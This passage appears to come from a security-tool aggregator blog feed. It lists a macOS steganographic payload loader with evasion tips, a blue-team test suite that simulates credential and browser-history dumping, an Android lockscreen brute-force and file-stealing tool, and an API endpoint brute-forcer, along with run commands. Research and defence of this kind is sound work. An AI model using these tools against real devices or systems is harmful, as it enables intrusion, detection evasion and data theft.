title="https://blogs.blackberry.com/en/2017/02/running-executables-on-macos-from-memory">https://blogs.blackberry.com/en/2017/02/running-executables-on-macos-from-memory</a>) will NOT WORK FOR GO COMPILED MACHOS. Every other macho I've tested works fine, so if you really want to use Go C2s such as Mythic, I recommend <a href="https://www.kitploit.com/search/label/Crafting" target="_blank" title="crafting">crafting</a> a custom macho which can function similar to osascript, and call a jxa payload in memory directly. As an exercise for the reader, you could also call payload bytes directly vs a URL with some slight modifications to this code.</p> <p>I would recommend changing this like the number of random bytes generated from the default, and changing the default header and footer bytes that forblaze uses to find the payload in the stego file (as well as the length of those header and footer bytes to perhaps be more inconspicious).</p> <br /><span style="font-size: large;"><b>Detection/Prevention</b></span><br /> <p>Steganography is pretty difficult to detect. If you know where the stego file is, you can begin to extract the suspect bytes after the end of the normal file EOF (so after "FFD9" for jpegs for example). These suspect bytes will still include the actual encrypted payload and <a href="https://www.kitploit.com/search/label/Nonsense" target="_blank" title="nonsense">nonsense</a> random bytes, which would be hard to distinguish from each other unless you possess the header and trailing bytes specified by Forblaze. You could look through these bytes and look for patterns of repeating bytes, since this is how the header and footer bytes with forblaze tend to work, but a skilled operator could make that more difficult to find than the default. If a payload is caught you could obviously RE the binary and try to locate the stego file, and then try to use the hard-coded key and headers/footers to reverse the URL being called (or other bytes). But that all assumes you found the binary by some other means.</p> <br /><span style="font-size: large;"><b>Testing</b></span><br /> <p>This tool has been tested on various versions of Mac OS, including Big Sur and Catalina (x64 systems). Please let me know if you have problems.</p> <br /><span style="font-size: large;"><b>Technical Nitty Gritty</b></span><br /> <p>The custom encryption is a basic Caesar cipher, where different bytes of the key are used to shift the bytes of your plaintext bytes. This is why larger keys aren't NECESSARILY better for your encryption - it depends on the length of your plaintext. If your plaintext is 50 bytes, and you use a 150 byte key, only the first 50 bytes of your key will be used. If your plaintext is > 150 bytes however, the longer keys would be more secure.</p> <p>The steganography is quite simple: the bytes of your original innocent file are kept the same, and random bytes (along with your encrypted payload bytes) are appended after these bytes. These random bytes are by default anywhere between 2 and 2000 in length (this should likely be changed to fit your plaintext size -> larger plaintexts should mean more random bytes are generated).</p> <p>The in-memory execution piece is exactly following <a href="https://blogs.blackberry.com/en/2017/02/running-executables-on-macos-from-memory" rel="nofollow" target="_blank" title="https://blogs.blackberry.com/en/2017/02/running-executables-on-macos-from-memory">https://blogs.blackberry.com/en/2017/02/running-executables-on-macos-from-memory</a>, with the simple change that instead of reading payload bytes from an on-disk file, they are read over http/https. Later I may add a technique which would allow you to execute Go compiled binaries (there are other sources out there which can also help with this), but for this default version Go compiled binaries will not work. This is because for some strange reason Go compiled machos do not utilize LC_MAIN like most machos do in the load commands of the image (if someone knows why, I am all ears).</p> <br /><span style="font-size: large;"><b>Contributions/Comments/Criticisms</b></span><br /> <p>I am very open to receiving comments and to collaboration! Hopefully this helps generate useful discussion around the topic of custom crypto, or provides researchers some new insights.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/asaurusrex/Forblaze" rel="nofollow" target="_blank" title="Download Forblaze">Download Forblaze</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-84094238889366715462021-06-22T08:30:00.010-04:002021-06-22T08:30:00.316-04:00Swift-Attack - Unit Tests For Blue Teams To Aid With Building Detections For Some Common macOS Post Exploitation Methods<p><a href="http://2.bp.blogspot.com/-aWl6BmFOZho/YNDQ4oMVGeI/AAAAAAAAcic/FaLbGO4M5tMlWl1o3EnecgPw5Y6Yr0NyACK4BGAYYCw/s1600/Swift-Attack_1_swiftattack-792260.png" style="text-align: center;"><img alt="" border="0" height="206" id="BLOGGER_PHOTO_ID_6976305494077282786" src="http://2.bp.blogspot.com/-aWl6BmFOZho/YNDQ4oMVGeI/AAAAAAAAcic/FaLbGO4M5tMlWl1o3EnecgPw5Y6Yr0NyACK4BGAYYCw/w640-h206/Swift-Attack_1_swiftattack-792260.png" width="640" /></a></p><br /> <p>Unit tests for <a href="https://www.kitploit.com/search/label/Blue%20Teams" target="_blank" title="blue teams">blue teams</a> to aid with building detections for some common macOS <a href="https://www.kitploit.com/search/label/Post%20Exploitation" target="_blank" title="post exploitation">post exploitation</a> methods. I have included some post <a href="https://www.kitploit.com/search/label/Exploitation" target="_blank" title="exploitation">exploitation</a> examples using both <a href="https://www.kitploit.com/search/label/Command%20Line" target="_blank" title="command line">command line</a> <a href="https://www.kitploit.com/search/label/History" target="_blank" title="history">history</a> and on disk binaries (which should be easier for detection) as well as post exploitation examples using API calls only (which will be more difficult for detection). The post exploitation examples included here are not all encompassing. Instead these are just some common examples that I thought w ould be useful to conduct unit tests around. I plan to continue to add to this project over time with additional unit tests.</p> <p>All of these tests run locally and return results to stdout (i.e., Swift-Attack does not connect to a server).</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Steps:</b></span><br /> <blockquote> <p>git clone <a href="https://github.com/cedowens/Swift-Attack" rel="nofollow" target="_blank" title="https://github.com/cedowens/Swift-Attack">https://github.com/cedowens/Swift-Attack</a></p> </blockquote> <ul> <li> <p>Ensure you have installed swift and developer tools (can install from the mac app store)</p> </li> <li> <p>open the xcodeproj file in XCode</p> </li> <li> <p>Build in XCode</p> </li> <li> <p>The compiled app will be dropped to something like: <em><strong>Users//Library/Developer/Xcode/DerivedData/Swift-Attack-[random]/Build/Products/Debug/Swift-Attack.app</strong></em></p> </li> <li> <p>cd to the directory above</p> </li> <li> <p>cd Swift-Attack.app/Contents/MacOS (you can run the macho from here or copy it elsewhere and run...up to you)</p> </li> <li> <p>grant the Swift-Attack macho full disk access to ensure you can run all of the tests without TCC issues</p> </li> <li> <p>run the following to remove any quarantine attributes:</p> </li> </ul> <blockquote> <p>xattr -c Swift-Attack</p> </blockquote> <ul> <li>Run Swift-Attack:</li> </ul> <blockquote> <p>./Swift-Attack -h</p> </blockquote> <p style="text-align: center;"><a href="https://github.com/cedowens/Swift-Attack/blob/main/swiftattack.png" rel="nofollow" target="_blank" title="Unit tests for blue teams to aid with building detections for some common macOS post exploitation methods. (7)"></a><a href="http://2.bp.blogspot.com/-aWl6BmFOZho/YNDQ4oMVGeI/AAAAAAAAcic/FaLbGO4M5tMlWl1o3EnecgPw5Y6Yr0NyACK4BGAYYCw/s1600/Swift-Attack_1_swiftattack-792260.png"><img alt="" border="0" height="206" id="BLOGGER_PHOTO_ID_6976305494077282786" src="http://2.bp.blogspot.com/-aWl6BmFOZho/YNDQ4oMVGeI/AAAAAAAAcic/FaLbGO4M5tMlWl1o3EnecgPw5Y6Yr0NyACK4BGAYYCw/w640-h206/Swift-Attack_1_swiftattack-792260.png" width="640" /></a></p> <br /><span style="font-size: large;"><b>Usage:</b></span><br /> <p>You can run Swift-Attack with a single option or multiple options</p> <blockquote> <p>./Swift-Attack [option1] [option2]...</p> </blockquote> <ul> <li> <p>I also included a simple macro.txt file (unobfuscated) for testing parent-child relationships around office macro executions on macOS. I did not obfuscate it since the focus is on parent-child relationship visibility/detection. If you want to test with an obfuscated macro, I have a repo at github.com/cedowens/MacC2 that contains an obfuscated macro.</p> </li> <li> <p>I also did not include any persistence items, since in my opinion it is best to just clone and test persistence using Leo Pitt's persistent JXA repo <a href="https://github.com/D00MFist/PersistentJXA" rel="nofollow" target="_blank" title="https://github.com/D00MFist/PersistentJXA">https://github.com/D00MFist/PersistentJXA</a>. This repo is by far the most comprehensive and current repo that I know of for macOS persistence.</p> </li> <li> <p>I recently ported some of the PersistentJXA repos over to Swift: <a href="https://github.com/cedowens/Persistent-Swift" rel="nofollow" target="_blank" title="https://github.com/cedowens/Persistent-Swift">https://github.com/cedowens/Persistent-Swift</a></p> </li> </ul> <br /><span style="font-size: large;"><b>Unit Tests Included:</b></span><br /> <ul> <li> <p>Prompt using osascript binary</p> </li> <li> <p>Prompt via API calls</p> </li> <li> <p>Clipboard dump using osascript binary</p> </li> <li> <p>Clipboard dump using API calls</p> </li> <li> <p>Screenshot using screencapture binary</p> </li> <li> <p>Screenshot using API calls</p> </li> <li> <p>Shell commands</p> </li> <li> <p>Dumping zsh history</p> </li> <li> <p>Security tool enumeration</p> </li> <li> <p>Grabbing system info using osascript binary</p> </li> <li> <p>Grabbing system info via API calls</p> </li> <li> <p>Dumping ssh, aws, gcp, and azure keys on disk</p> </li> <li> <p>Dumping browser history (Chrome, Safari, Firefox)</p> </li> <li> <p>Dumping Quarantine history</p> </li> <li> <p>Office Macro: I included a simple office macro that connects to local host. Note: the macro will invoke curl to make a GET request using python to <a href="http://127.0.0.1/testing" rel="nofollow" target="_blank" title="http://127.0.0.1/testing">http://127.0.0.1/testing</a> when executed by clicking the "Enable Macros" button. This will allow you to test detections for parent-child relationships around macro execution. Note: this simple test does not include any obfuscation, since the test is really more geared towards parent-child relationships. You can use another repo of mine at <a href="https://github.com/cedowens/MacC2" rel="nofollow" target="_blank" title="https://github.com/cedowens/MacC2">https://github.com/cedowens/MacC2</a> to test with obfuscated macros. To use, just simply paste the contents of "macro.txt" into an office Doc, save as a macro enabled document or as 97-2004 document format (ex: .doc, .xls, etc.), and click "Enable Macros" when opening the doc to execute. </p> </li> <li> <p>Installer Package: I included TestInstaller.pkg file to test for detections around a basic installer package. This installer package includes a preinstall script which runs in bash and drops com.simple.agent.plist to /Library/LaunchDaemons/ and drops test.js (simple popup prompt) to /Library/Application Support/. The com.simple.agent.plist file simply runs osascript against /Library/Application Support/test.js. It also includes a postinstall script which runs in bash and loads the com.simple.agent.plis using launchctl load. While holding the Control button click Open on TestInstaller.pkg to run it. TestInstaller.pkg will drop the aforementioned files as root.</p> </li> <li> <p>CVE-2021-30657 Bypass Payloads: Two sample payloads (both make curl requests to localhost when detonated) to test two different types of payloads that abuse cve-2021-30657. More info here: <a href="https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508" rel="nofollow" target="_blank" title="https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508">https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508</a></p> </li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/cedowens/Swift-Attack" rel="nofollow" target="_blank" title="Download Swift-Attack">Download Swift-Attack</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-47283001476656203832021-05-24T17:30:00.008-04:002021-05-24T17:30:00.302-04:00CiLocks - Android LockScreen Bypass<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-gC11e2udHzY/YKru8f-wuYI/AAAAAAAAWQc/EejT8t57b1Uo-8mjMlBFiPaFOqSgGXpBgCNcBGAsYHQ/s650/CiLocks_1_Screenshot_2021-05-02_14-32-27.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="513" data-original-width="650" height="506" src="https://1.bp.blogspot.com/-gC11e2udHzY/YKru8f-wuYI/AAAAAAAAWQc/EejT8t57b1Uo-8mjMlBFiPaFOqSgGXpBgCNcBGAsYHQ/w640-h506/CiLocks_1_Screenshot_2021-05-02_14-32-27.png" width="640" /></a></div><p><br /></p><p>CiLocks - Android LockScreen Bypass</p><br /><span style="font-size: large;"><b>Features</b></span><br /> <ul> <li>Brute Pin 4 Digit</li> <li>Brute Pin 6 Digit</li> <li>Brute LockScreen Using Wordlist</li> <li>Bypass LockScreen {Antiguard} Not Support All OS Version</li> <li>Root <a href="https://www.kitploit.com/search/label/Android" target="_blank" title="Android">Android</a> {Supersu} Not Support All OS Version</li> <li>Steal File</li> <li>Reset Data</li></ul><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Required</b></span><br /> <br /> - Adb {Android SDK} <br /> - Cable Usb <br /> - Android <a href="https://www.kitploit.com/search/label/Emulator" target="_blank" title="Emulator">Emulator</a> {NetHunter/Termux} Root <br /> - Or Computer <br /> <br /><span style="font-size: large;"><b> Compatible </b></span><br /> <br /> - Linux <br /> - <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="Windows">Windows</a> <br /> - Mac <br /> <br /><span style="font-size: large;"><b> Tested On </b></span><br /><br /> - <a href="https://www.kitploit.com/search/label/Kali%20Linux" target="_blank" title="Kali Linux">Kali Linux</a> <br /> <br /><span style="font-size: large;"><b> How To Run </b></span><br /><br /> - git clone <a href="https://github.com/tegal1337/CiLocks" rel="nofollow" target="_blank" title="https://github.com/tegal1337/CiLocks">https://github.com/tegal1337/CiLocks</a> <br /> - cd CiLocks <br /> - chmod +x cilocks <br /> - bash cilocks <br /> <br /> <br /><span style="font-size: x-large;"><b> For Android Emulator </b></span><br /> <br /> - Install Busybox <br /> - Root <br /> <br /><b> If <a href="https://www.kitploit.com/search/label/Brute" target="_blank" title="brute">brute</a> doesn't work then uncomment this code </b><br /><br /> `# adb shell input keyevent 26` <br /> if 5x the wrong password will automatically delay 30 seconds<div> <br /><span style="font-size: large;"><b>Image </b></span><br /><p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-1jb1PwOotyw/YKrvCT5hkBI/AAAAAAAAWQg/lsvFZOPolQ8y_HhOKjZILre_iRpd9hpSACNcBGAsYHQ/s650/CiLocks_1_Screenshot_2021-05-02_14-32-27.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="513" data-original-width="650" height="506" src="https://1.bp.blogspot.com/-1jb1PwOotyw/YKrvCT5hkBI/AAAAAAAAWQg/lsvFZOPolQ8y_HhOKjZILre_iRpd9hpSACNcBGAsYHQ/w640-h506/CiLocks_1_Screenshot_2021-05-02_14-32-27.png" width="640" /></a></div><p><br /></p><span style="font-size: large;"><b> Video</b></span><br /> <br /> Bypass LockScreen <br /> <a href="https://youtu.be/PPMhzt4lGmU" rel="nofollow" target="_blank" title="https://youtu.be/PPMhzt4lGmU">https://youtu.be/PPMhzt4lGmU</a> <br /> BruteForce Pin <br /> <a href="https://youtu.be/D2xjJUQ9Lsw" rel="nofollow" target="_blank" title="https://youtu.be/D2xjJUQ9Lsw">https://youtu.be/D2xjJUQ9Lsw</a> <br /><span style="font-size: large;"><b>Reference And Media</b></span><br /> <br /> <a href="https://stackoverflow.com/questions/29072501/how-to-unlock-android-phone-through-adb" rel="nofollow" target="_blank" title="https://stackoverflow.com/questions/29072501/how-to-unlock-android-phone-through-adb">https://stackoverflow.com/questions/29072501/how-to-unlock-android-phone-through-adb</a> <br /> <a href="http://www.hak5.org/episodes/hak5-1205" rel="nofollow" target="_blank" title="http://www.hak5.org/episodes/hak5-1205">http://www.hak5.org/episodes/hak5-1205</a> <br /> <a href="https://github.com/kosborn/p2p-adb" rel="nofollow" target="_blank" title="https://github.com/kosborn/p2p-adb">https://github.com/kosborn/p2p-adb</a> <br /> <a href="https://forum.xda-developers.com/t/universal-guide-root-any-android-device-manually.2684210/" rel="nofollow" target="_blank" title="https://forum.xda-developers.com/t/universal-guide-root-any-android-device-manually.2684210/">https://forum.xda-developers.com/t/universal-guide-root-any-android-device-manually.2684210/</a> <br /> <a href="https://stackoverflow.com/questions/14685721/how-can-i-do-factory-reset-using-adb-in-android" rel="nofollow" target="_blank" title="https://stackoverflow.com/questions/14685721/how-can-i-do-factory-reset-using-adb-in-android">https://stackoverflow.com/questions/14685721/how-can-i-do-factory-reset-using-adb-in-android</a> <br /> Contac Me <a href="mailto:mitsuhamizaki@gmail.com" rel="nofollow" target="_blank" title="Email">Email</a> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/tegal1337/CiLocks" rel="nofollow" target="_blank" title="Download CiLocks">Download CiLocks</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-67937169260932906522021-05-08T17:30:00.017-04:002021-05-08T17:30:00.323-04:00Kiterunner - Contextual Content Discovery Tool<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-A-bBRewl_os/YJCbwgSS5uI/AAAAAAAAWGA/ripyTN96MfskSTj9AyUeJD949OAZ0tFHwCNcBGAsYHQ/s640/kiterunner_1_kiterunner.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="241" data-original-width="640" height="240" src="https://1.bp.blogspot.com/-A-bBRewl_os/YJCbwgSS5uI/AAAAAAAAWGA/ripyTN96MfskSTj9AyUeJD949OAZ0tFHwCNcBGAsYHQ/w640-h240/kiterunner_1_kiterunner.png" width="640" /></a></div><p><br /></p> <p>For the longest of times, <a href="https://www.kitploit.com/search/label/Content%20Discovery" target="_blank" title="content discovery">content discovery</a> has been focused on finding files and folders. While this approach is effective for legacy web servers that host static files or respond with 3xx’s upon a partial path, it is no longer effective for modern web applications, specifically APIs.</p> <p>Over time, we have seen a lot of time invested in making content discovery tools faster so that larger wordlists can be used, however the art of content discovery has not been innovated upon.</p> <p>Kiterunner is a tool that is capable of not only performing traditional content discovery at lightning fast speeds, but also <a href="https://www.kitploit.com/search/label/Bruteforcing" target="_blank" title="bruteforcing">bruteforcing</a> routes/endpoints in modern applications.</p> <p>Modern application frameworks such as Flask, Rails, Express, Django and others follow the paradigm of explicitly defining routes which expect certain HTTP methods, headers, parameters and values.</p> <p>When using traditional content discovery tooling, such routes are often missed and cannot easily be discovered.</p> <p>By collating a dataset of Swagger specifications and condensing it into our own schema, Kiterunner can use this dataset to bruteforce API endpoints by sending the correct HTTP method, headers, path, parameters and values for each request it sends.</p> <p>Swagger files were collected from a number of datasources, including an internet wide scan for the 40+ most common swagger paths. Other datasources included <a href="https://cloud.google.com/bigquery/public-data/github" rel="nofollow" target="_blank" title="GitHub via BigQuery">GitHub via BigQuery</a>, and <a href="https://apis.guru/" rel="nofollow" target="_blank" title="APIs.guru">APIs.guru</a>.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: x-large;"><b>Installation</b></span><br /> <br /><span style="font-size: large;"><b>Downloading a release</b></span><br /> <p>You can download a pre-built copy from <a href="https://github.com/assetnote/kiterunner/releases" rel="nofollow" target="_blank" title="https://github.com/assetnote/kiterunner/releases">https://github.com/assetnote/kiterunner/releases</a>.</p> <br /><span style="font-size: large;"><b>Building from source</b></span><br /> <div><pre><code># build the binary<br />make build<br /><br /># symlink your binary<br />ln -s $(pwd)/dist/kr /usr/local/bin/kr<br /><br /># compile the wordlist<br /># kr kb compile <input.json> <output.kite><br />kr kb compile routes.json routes.kite<br /><br /># scan away<br />kr scan hosts.txt -w routes.kite -x 20 -j 100 --ignore-length=1053</code></pre></div> <p>The JSON datasets can be found below:</p> <ul> <li><a href="https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-large.json.tar.gz" rel="nofollow" target="_blank" title="routes-large.json">routes-large.json</a> (118MB compressed, 2.6GB decompressed)</li> <li><a href="https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-small.json.tar.gz" rel="nofollow" target="_blank" title="routes-small.json">routes-small.json</a> (14MB compressed, 228MB decompressed)</li> </ul> <p>Alternatively, it is possible to download the compile <code>.kite</code> files from the links below:</p> <ul> <li><a href="https://wordlists-cdn.assetnote.io/data/kiterunner/routes-large.kite.tar.gz" rel="nofollow" target="_blank" title="routes-large.kite">routes-large.kite</a> (40MB compressed, 183M decompressed)</li> <li><a href="https://wordlists-cdn.assetnote.io/data/kiterunner/routes-small.kite.tar.gz" rel="nofollow" target="_blank" title="routes-small.kite">routes-small.kite</a> (2MB compressed, 35MB decompressed)</li> </ul> <br /><span style="font-size: x-large;"><b>Usage</b></span><br /> <br /><span style="font-size: large;"><b>Quick Start</b></span><br /> <pre><code>kr [scan|brute] <input> [flags]<br /></code></pre> <ul> <li><code><input></code> can be a file, a domain, or URI. we'll figure it out for you. See <a href="https://github.com/assetnote/kiterunner#inputhost-formatting" rel="nofollow" target="_blank" title="Input/Host Formatting">Input/Host Formatting</a> for more details</li> </ul> <pre><code># Just have a list of hosts and no wordlist<br />kr scan hosts.txt -A=apiroutes-210328:20000 -x 5 -j 100 --fail-status-codes 400,401,404,403,501,502,426,411<br /><br /># You have your own wordlist but you want assetnote wordlists too<br />kr scan target.com -w routes.kite -A=apiroutes-210328:20000 -x 20 -j 1 --fail-status-codes 400,401,404,403,501,502,426,411<br /><br /># <a href="https://www.kitploit.com/search/label/Bruteforce" target="_blank" title="Bruteforce">Bruteforce</a> like normal but with the first 20000 words<br />kr brute https://target.com/subapp/ -A=aspx-210328:20000 -x 20 -j 1<br /><br /># Use a dirsearch style wordlist with %EXT%<br />kr brute https://target.com/subapp/ -w dirsearch.txt -x 20 -j 1 -exml,asp,aspx,ashx -D<br /></code></pre> <br /><span style="font-size: large;"><b>CLI Help</b></span><br /> <pre><code>Usage:<br /> kite scan [flags]<br /><br />Flags:<br /> -A, --assetnote-wordlist strings use the wordlists from wordlist.assetnote.io. specify the type/name to use, e.g. apiroutes-210228. You can specify an additional maxlength to use only the first N values in the wordlist, e.g. apiroutes-210228;20000 will only use the first 20000 lines in that wordlist<br /> --blacklist-domain strings domains that are blacklisted for redirects. We will not follow redirects to these domains<br /> --delay duration delay to place inbetween requests to a single host<br /> --disable-precheck whether to skip host discovery<br /> --fail-status-codes ints which status codes blacklist as fail. if this is set, this will override success-status-codes<br /> --filter-api strings only scan apis matching this ksuid<br /> --force-method string whether to ignore the methods specified in the ogl file and force this method <br /> -H, --header strings headers to add to requests (default [x-forwarded-for: 127.0.0.1])<br /> -h, --help help for scan<br /> --ignore-length strings a range of content length bytes to ignore. you can have multiple. e.g. 100-105 or 1234 or 123,34-53. This is inclusive on both ends<br /> --kitebuilder-full-scan perform a full scan without first performing a phase scan.<br /> -w, --kitebuilder-list strings ogl wordlist to use for scanning<br /> -x, --max-connection-per-host int max connections to a single host (default 3)<br /> -j, --max-parallel-hosts int max number of concurrent hosts to scan at once (default 50)<br /> --max-redirects int maximum number of redirects to follow (default 3)<br /> -d, --preflight-depth int when performing preflight checks, what directory depth do we attempt to check. 0 means that only the docroot is checked (default 1)<br /> --profile-name st ring name for profile output file<br /> --progress a progress bar while scanning. by default enabled only on Stderr (default true)<br /> --quarantine-threshold int if the host return N consecutive hits, we quarantine the host as wildcard. Set to 0 to disable (default 10)<br /> --success-status-codes ints which status codes whitelist as success. this is the default mode<br /> -t, --timeout duration timeout to use on all requests (default 3s)<br /> --user-agent string user agent to use for requests (default "Chrome. Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36")<br /> --wildcard-detection can be set to false to disable wildcard redirect detection (default true)<br /><br />Global Flags:<br /> --config string config file (default is $HOME/.kiterunner.yaml)<br /> -o, --output string output format. can be json,t ext,pretty (default "pretty")<br /> -q, --quiet quiet mode. will mute unecessarry pretty text<br /> -v, --verbose string level of logging verbosity. can be error,info,debug,trace (default "info")<br /></code></pre> <p>bruteforce flags (all the flags above +)</p> <pre><code> -D, --dirsearch-compat this will replace %EXT% with the extensions provided. backwards compat with dirsearch because shubs loves him some dirsearch<br /> -e, --extensions strings extensions to append while scanning<br /> -w, --wordlist strings normal wordlist to use for scanning<br /></code></pre> <br /><span style="font-size: large;"><b>Input/Host Formatting</b></span><br /> <p>When supplied with an input, kiterunner will attempt to resolve the input in the following order:</p> <ol> <li>Is the input a file. If so read all the lines in the file as separate domains</li> <li>The input is treated as a "domain"</li> </ol> <p>If you supply a "domain", but it exists as a file, e.g. <code>google.com</code> but <code>google.com</code> is also a txt file in the current directory, we'll load <code>google.com</code> the text file, because we found it first.</p> <p><strong>Domain Parsing</strong></p> <p>Its preferred that you provide a full URI as the input, however you can provide incomplete URIs and we'll try and guess what you mean. An example list of domains you can supply are:</p> <pre><code>one.com<br />two.com:80<br />three.com:443<br />four.com:9447<br />https://five.com:9090<br />http://six.com:80/api<br /></code></pre> <p>The above list of domains will expand into the subsequent list of targets</p> <pre><code>(two targets are created for one.com, since neither port nor protocol was specified)<br />http://one.com (port 80 implied)<br />https://one.com (port 443 implied)<br /><br />http://two.com (port 80 implied)<br />https://three.com (port 443 implied)<br />http://four.com:9447 (non-tls port guessed)<br />https://five.com:9090<br />http://six.com/api (port 80 implied; basepath API appended)<br /></code></pre> <p>the rules we apply are:</p> <ul> <li>if you supply a scheme, we use the scheme. <ul> <li>We only support http & https</li> <li>if you don't supply a scheme, we'll guess based on the port</li> </ul> </li> <li>if you supply a port, we'll use the port <ul> <li>If your port is 443, or 8443, we'll assume its tls</li> <li>if you don't supply a port, we'll guess both port 80, 443</li> </ul> </li> <li>if you supply a path, we'll prepend that path to all requests against that host</li> </ul> <br /><span style="font-size: large;"><b>API Scanning</b></span><br /> <p>When you have a single target</p> <div><pre><code># single target<br />kr scan https://target.com:8443/ -w routes.kite -A=apiroutes-210228:20000 -x 10 --ignore-length=34<br /><br /># single target, but you want to try http and https<br />kr scan target.com -w routes.kite -A=apiroutes-210228:20000 -x 10 --ignore-length=34<br /><br /># a list of targets<br />kr scan targets.txt -w routes.kite -A=apiroutes-210228:20000 -x 10 --ignore-length=34</code></pre></div> <br /><span style="font-size: large;"><b>Vanilla Bruteforcing</b></span><br /> <div><pre><code>kr brute https://target.com -A=raft-large-words -A=apiroutes-210228:20000 -x 10 -d=0 --ignore-length=34 -ejson,txt</code></pre></div> <br /><span style="font-size: large;"><b>Dirsearch Bruteforcing</b></span><br /> <p>For when you have an old-school wordlist that still has %EXT% in the wordlist, you can use <code>-D</code>. this will only substitute the extension where %EXT% is present in the path</p> <div><pre><code>kr brute https://target.com -w dirsearch.txt -x 10 -d=0 --ignore-length=34 -ejson,txt -D</code></pre></div> <br /><span style="font-size: x-large;"><b>Technical Features</b></span><br /> <br /><span style="font-size: large;"><b>Depth Scanning</b></span><br /> <p>A key feature of kiterunner is depth based scanning. This attempts to handle detecting wildcards given virtual application path based routing. The depth defines how many directories deep the baseline checks are performed E.g.</p> <div><pre><code>~/kiterunner $ cat wordlist.txt<br /><br />/api/v1/user/create<br />/api/v1/user/delete<br />/api/v2/user/<br />/api/v2/admin/<br />/secrets/v1/<br />/secrets/v2/</code></pre></div> <ul> <li>At depth 0, only <code>/</code> would have the baseline checks performed for wildcard detection</li> <li>At depth 1, <code>/api</code> and <code>/secrets</code> would have baseline checks performed; and these checks would be used against <code>/api</code> and <code>/secrets</code> correspondingly</li> <li>At depth 2, <code>/api/v1</code>, <code>/api/v2</code>, <code>/secrets/v1</code> and <code>/secrets/v2</code> would all have baseline checks performed.</li> </ul> <p>By default, <code>kr scan</code> has a depth of 1, since from internal usage, we've often seen this as the most common depth where virtual routing has occured. <code>kr brute</code> has a default depth of 0, as you typically don't want this check to be performed with a static wordlist.</p> <p>Naturally, increasing the depth will increase the accuracy of your scans, however this also increases the number of requests to the target. (<code># of baseline checks * # of depth baseline directories</code>). Hence, we recommend against going above 1, and in rare cases going to depth 2.</p> <br /><span style="font-size: large;"><b>Using Assetnote Wordlists</b></span><br /> <p>We provide inbuilt downloading and caching of wordlists from assetnote.io. You can use these with the <code>-A</code> flag which receives a comma delimited list of aliases, or fullnames.</p> <p>You can get a full list of all the Assetnote wordlists with <code>kr wordlist list</code>.</p> <p>The wordlists when used, are cached in <code>~/.cache/kiterunner/wordlists</code>. When used, these are compiled from <code>.txt</code> -> <code>.kite</code></p> <pre><code>+-----------------------------------+-------------------------------------------------------+----------------+---------+----------+--------+<br />| ALIAS | FILENAME | SOURCE | COUNT | FILESIZE | CACHED |<br />+-----------------------------------+-------------------------------------------------------+----------------+---------+----------+--------+<br />| 2m-subdomains | 2m-subdomains.txt | manual.json | 2167059 | 28.0mb | false |<br />| asp_lowercase | asp_lowercase.txt | manual.json | 24074 | 1.1mb | false |<br />| aspx_lowercase | aspx_lowercase.txt | manual.json | 80293 | 4.4mb | false |<br />| bak | bak.txt | manual.json | 3172 5 | 634.8kb | false |<br />| best-dns-wordlist | best-dns-wordlist.txt | manual.json | 9996122 | 139.0mb | false |<br />| cfm | cfm.txt | manual.json | 12100 | 260.3kb | true |<br />| do | do.txt | manual.json | 173152 | 4.8mb | false |<br />| dot_filenames | dot_filenames.txt | manual.json | 3191712 | 71.3mb | false |<br />| html | html.txt | manual.json | 4227526 | 107.7mb | false |<br />| apiroutes-201120 | httparchive_apiroutes_2020_11_20.txt | automated.json | 953011 | 45.3mb | false |<br />| apiroutes-210128 | httparchive_apiroutes_2021_01_28.txt | autom ated.json | 225456 | 6.6mb | false |<br />| apiroutes-210228 | httparchive_apiroutes_2021_02_28.txt | automated.json | 223544 | 6.5mb | true |<br />| apiroutes-210328 | httparchive_apiroutes_2021_03_28.txt | automated.json | 215114 | 6.3mb | false |<br />| aspx-201118 | httparchive_aspx_asp_cfm_svc_ashx_asmx_2020_11_18.txt | automated.json | 63200 | 1.7mb | false |<br />| aspx-210128 | httparchive_aspx_asp_cfm_svc_ashx_asmx_2021_01_28.txt | automated.json | 46286 | 928.7kb | false |<br />| aspx-210228 | httparchive_aspx_asp_cfm_svc_ashx_asmx_2021_02_28.txt | automated.json | 43958 | 883.3kb | false |<br />| aspx-210328 | httparchive_aspx_asp_cfm_svc_ashx_asmx_2021_03_28.txt | automated.json | 45928 | 926.8kb | false |<br />| cgi-201118 | httparchive_cgi_pl_2020_11_18.txt | automated.json | 2637 | 44.0kb | false |<br /><br /><SNIP><br /></code></pre> <p><strong>Usage</strong></p> <pre><code>kr scan targets.txt -A=apiroutes-210228 -x 10 --ignore-length=34<br />kr brute targets.txt -A=aspx-210228 -x 10 --ignore-length=34 -easp,aspx<br /></code></pre> <br /><b>Head Syntax</b><br /> <p>When using assetnote provided wordlists, you may not want to use the entire wordlist, so you can opt to use the first N lines in a given wordlist using the <code>head syntax</code>. The format is <code><wordlist_name>:<N lines></code> when specifying a wordlist.</p> 